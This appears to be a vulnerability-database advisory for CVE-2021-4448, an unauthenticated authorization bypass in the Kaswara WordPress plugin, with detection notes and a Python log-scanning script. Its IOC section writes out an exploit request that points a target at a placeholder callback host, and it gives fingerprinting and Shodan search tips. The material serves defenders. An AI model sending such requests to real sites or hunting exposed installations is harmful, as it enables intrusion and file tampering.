CVE-2021-4448
published 2024-10-16


Priority: P181 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 1.34% (67.8th percentile)
The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.

Affected

2 ranges

Vendor           Product                   Version range  Fixed in
kaswara_project  kaswara                   <= 3.0.1
sayenthemes      kaswara_modern_vc_addons  <= 3.0.1

Detection & IOCs (extracted from sources)

url: /wp-admin/admin-ajax.php
command: action=kaswaraImportDemo&contentUrl=http://{{interactsh-url}}/
  • Detect exploitation attempts by monitoring POST requests to /wp-admin/admin-ajax.php with the body parameter 'action=kaswaraImportDemo', which is the unauthenticated AJAX action abused in this CVE.
  • A successful server-side request triggered by the exploit will cause the WordPress instance to make an outbound HTTP request to an attacker-controlled URL supplied in the 'contentUrl' parameter.
  • A vulnerable server response body will contain the string 'missing/invalid WXR version number', confirming the AJAX action was reached and executed without authentication.
  • Shodan fingerprinting for exposed vulnerable instances can use the HTML keyword 'kaswara' to identify WordPress sites running the plugin.
  • The vulnerability affects all Kaswara Modern VC Addons plugin versions up to and including 3.0.1; version-based detection should flag any installation at or below this version.
  • The exploit requires no authentication (PR:N, UI:N); any unauthenticated HTTP client can trigger the vulnerable AJAX actions, so network-layer controls alone are insufficient.
  • Multiple AJAX actions beyond 'kaswaraImportDemo' are affected; detection rules scoped only to this single action may miss other exploitation vectors exposed by the same missing-authorization flaw.
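
One way to turn the detection notes above into a log check, as an added example that is not taken from this page or its sources. It assumes a reverse-proxy or WAF log in JSON lines that records request bodies (the field names are hypothetical), matches any action beginning with 'kaswara' as a heuristic for the other affected actions the page does not name, and reads the action from both query string and body regardless of method, since WordPress takes it from $_REQUEST.

```python
import json
from urllib.parse import urlsplit, parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION_PREFIX = "kaswara"  # assumption: prefix match to cover the plugin's other actions

# Constructed sample records (not real traffic); field names are hypothetical.
SAMPLE_LOG = """\
{"src":"203.0.113.7","method":"POST","uri":"/wp-admin/admin-ajax.php","cookie":"","body":"action=kaswaraImportDemo&contentUrl=http://callback.example.test/"}
{"src":"198.51.100.4","method":"POST","uri":"/wp-admin/admin-ajax.php","cookie":"wordpress_logged_in_abc=editor","body":"action=heartbeat"}
{"src":"203.0.113.9","method":"POST","uri":"/wp-admin/admin-ajax.php?action=kaswaraHypotheticalAction","cookie":"","body":"x=1"}
{"src":"192.0.2.10","method":"GET","uri":"/wp-admin/admin-ajax.php?action=heartbeat","cookie":"","body":""}
"""

def findings(log_text):
    """Return one finding per request that reaches a kaswara* AJAX action."""
    out = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        url = urlsplit(rec["uri"])
        if url.path != AJAX_PATH:
            continue
        # Merge query-string and form-body parameters, as $_REQUEST would.
        params = parse_qs(url.query)
        for key, values in parse_qs(rec.get("body", "")).items():
            params.setdefault(key, []).extend(values)
        actions = [a for a in params.get("action", [])
                   if a.lower().startswith(ACTION_PREFIX)]
        if not actions:
            continue
        out.append({
            "src": rec["src"],
            "method": rec["method"],
            "action": actions[0],
            # No login cookie means the request was certainly unauthenticated;
            # a cookie being present does not prove the session was valid.
            "authenticated": "wordpress_logged_in_" in rec.get("cookie", ""),
            # Hosts to correlate against egress/DNS logs for the outbound fetch.
            "callback_hosts": [urlsplit(u).hostname
                               for u in params.get("contentUrl", [])],
        })
    return out

if __name__ == "__main__":
    for f in findings(SAMPLE_LOG):
        print(f)
```

The `callback_hosts` values are the ones to look for in egress or DNS logs from the WordPress host, which is how the outbound request described in the second bullet would show up.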

CVSS provenance

nvd: v3.1, 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 7.3 HIGH